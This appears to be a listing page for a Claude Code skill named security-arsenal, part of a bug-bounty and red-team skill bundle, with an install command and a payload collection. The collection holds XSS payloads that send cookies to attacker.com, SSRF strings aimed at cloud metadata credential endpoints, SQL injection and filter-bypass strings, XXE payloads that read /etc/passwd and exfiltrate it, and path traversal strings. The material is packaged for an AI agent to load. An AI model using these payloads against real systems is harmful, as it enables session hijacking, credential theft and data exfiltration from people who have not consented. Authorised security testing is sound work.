apk-redteam-pipeline
End-to-end Android APK red-team pipeline — automated APK acquisition (Play Store + apkpure + apkmirror fallback), jadx decompilation, secret/URL/JWT/Firebase…
Security payloads, bypass tables, wordlists, gf pattern names, always-rejected bug list, and conditionally-valid-with-chain table. Use when you need specific payloads for XSS/SSRF/SQLi/XXE/NoSQLi/command injection/SSTI/IDOR/path-traversal/HTTP smuggling/WebSocket/MFA bypass, or
$ npx -y skills add elementalsouls/Claude-BugHunter --skill security-arsenal --agent claude-codeHow it fires
How this skill gets triggered: by you, by Claude, or both.
/security-arsenalContext preview
The summary Claude sees to decide when to auto-load this skill.
Security payloads, bypass tables, wordlists, gf pattern names, always-rejected bug list, and conditionally-valid-with-chain table. Use when you need specific payloads for XSS/SSRF/SQLi/XXE/NoSQLi/command injection/SSTI/IDOR/path-traversal/HTTP smuggling/WebSocket/MFA bypass, or
name: security-arsenal description: Security payloads, bypass tables, wordlists, gf pattern names, always-rejected bug list, and conditionally-valid-with-chain table. Use when you need specific payloads for XSS/SSRF/SQLi/XXE/NoSQLi/command injection/SSTI/IDOR/path-traversal/HTTP smuggling/WebSocket/MFA bypass, or bypass techniques. Submittability and the always-rejected / what-NOT-to-submit decision are owned by triage-validation. sources: community, public_research
Payloads, bypass tables, wordlists, and submission rules.
---
<script>alert(document.domain)</script> <img src=x onerror=alert(document.domain)> <svg onload=alert(document.domain)> "><script>alert(1)</script> '><img src=x onerror=alert(1)> javascript:alert(document.domain)
<script>document.location='https://attacker.com/c?c='+document.cookie</script>
<img src=x onerror="fetch('https://attacker.com?c='+document.cookie)">
<script>fetch('https://attacker.com?c='+btoa(document.cookie))</script>// If unsafe-inline blocked — use fetch/XHR
<img src=x onerror="fetch('https://attacker.com?d='+btoa(document.cookie))">
// If script-src nonce present — find nonce reflection
<script nonce="NONCE_FROM_PAGE">alert(1)</script>
// Angular template injection (bypasses many CSPs)
{{constructor.constructor('alert(1)')()}}
// React dangerouslySetInnerHTML reflection
// Vue v-html binding
// mXSS (mutation-based XSS)
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
// Polyglot (works in HTML/JS/CSS context)
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>// Sources (user-controlled input) location.hash location.search location.href document.referrer window.name document.URL // Sinks (dangerous) innerHTML = SOURCE outerHTML = SOURCE document.write(SOURCE) eval(SOURCE) setTimeout(SOURCE, ...) // string form setInterval(SOURCE, ...) new Function(SOURCE) element.src = SOURCE // javascript: URI element.href = SOURCE location.href = SOURCE
---
# AWS http://169.254.169.254/latest/meta-data/ http://169.254.169.254/latest/meta-data/iam/security-credentials/ http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE-NAME http://169.254.169.254/latest/user-data/ http://169.254.169.254/latest/dynamic/instance-identity/document # GCP http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token # Header: Metadata-Flavor: Google # Azure IMDS http://169.254.169.254/metadata/instance?api-version=2021-02-01 # Header: Metadata: true
http://localhost:6379 # Redis (unauthenticated, RESP protocol) http://localhost:9200 # Elasticsearch (/_cat/indices) http://localhost:27017 # MongoDB (binary — check for connection refused vs timeout) http://localhost:8080 # Admin panel http://localhost:2375 # Docker API — GET /containers/json http://localhost:10.96.0.1:443 # Kubernetes API server
# All of these map to 127.0.0.1: http://2130706433 # decimal http://0177.0.0.1 # octal http://0x7f.0x0.0x0.0x1 # hex http://127.1 # short form http://[::1] # IPv6 loopback http://[::ffff:127.0.0.1] # IPv4-mapped IPv6 http://[::ffff:0x7f000001] # mixed hex IPv6 # DNS rebinding: A→external, then resolves to internal after allowlist check # Redirect chain (Vercel pattern): # If filter only checks initial URL but follows redirects: http://allowed-domain.com/redirect?to=http://169.254.169.254/
---
' '' ` ') ')) ' OR '1'='1 ' OR 1=1-- ' OR 1=1# ' UNION SELECT NULL-- '; WAITFOR DELAY '0:0:5'-- -- MSSQL time-based '; SELECT SLEEP(5)-- -- MySQL time-based ' OR SLEEP(5)--
' UNION SELECT NULL-- ' UNION SELECT NULL,NULL-- ' UNION SELECT NULL,NULL,NULL-- ' UNION SELECT 'a',NULL,NULL--
# MySQL
' AND SLEEP(5)--
# PostgreSQL
' AND pg_sleep(5)--
# MSSQL
'; WAITFOR DELAY '0:0:5'--
# Oracle
' AND 1=dbms_pipe.receive_message('a',5)--/*!50000 SELECT*/ * FROM users -- MySQL inline comment SE/**/LECT * FROM users -- comment injection SeLeCt * FrOm uSeRs -- case variation %27 OR %271%27=%271 -- URL encoding ʼ OR ʼ1ʼ=ʼ1 -- Unicode apostrophe
---
<?xml version="1.0"?> <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <foo>&xxe;</foo>
<?xml version="1.0"?> <!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://attacker.burpcollaborator.net/xxe">]> <foo>&xxe;</foo>
<?xml version="1.0"?> <!DOCTYPE foo [ <!ENTITY % data SYSTEM "file:///etc/passwd"> <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://attacker.com/?%data;'>"> %param1; ]> <foo>&exfil;</foo>
---
../../../etc/passwd ....//....//....//etc/passwd ..%2F..%2F..%2Fetc%2Fpasswd %2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd ..%252f..%252f..%252fetc%252fpasswd # double URL encoding /etc/passwd%00.jpg # null byte truncation ....\/....\/etc/passwd # mix of separators
---
#
A self-contained Claude skill bundle for bug hunting and external red-team work · 83 skills · 15 slash commands · 681 disclosed-report patterns (433 now individually cited & auditable) across 24 core vulnerability classes · enterprise identity +
Repo: elementalsouls/Claude-BugHunter
End-to-end Android APK red-team pipeline — automated APK acquisition (Play Store + apkpure + apkmirror fallback), jadx decompilation, secret/URL/JWT/Firebase…
Local-tooling companion to the bug-bounty orchestrator — carries the SAME complete bug-bounty workflow, but reach for THIS variant when you also need to…
Use at the START of any bug bounty hunting session, when switching targets, or when feeling lost about what to do next. Master orchestrator that combines the…
Complete bug bounty workflow — recon (subdomain enumeration, asset discovery, fingerprinting, HackerOne scope, source code audit), pre-hunt learning (disclosed…
Bugcrowd-specific reporting tactics complementing report-writing: VRT category search-and-fallback strategy when no exact match exists, manual severity…
Cloud IAM red-team attack chain across AWS, Azure, GCP — focused on EXTERNAL exploitation paths and post-credential-discovery privilege analysis. Covers IAM…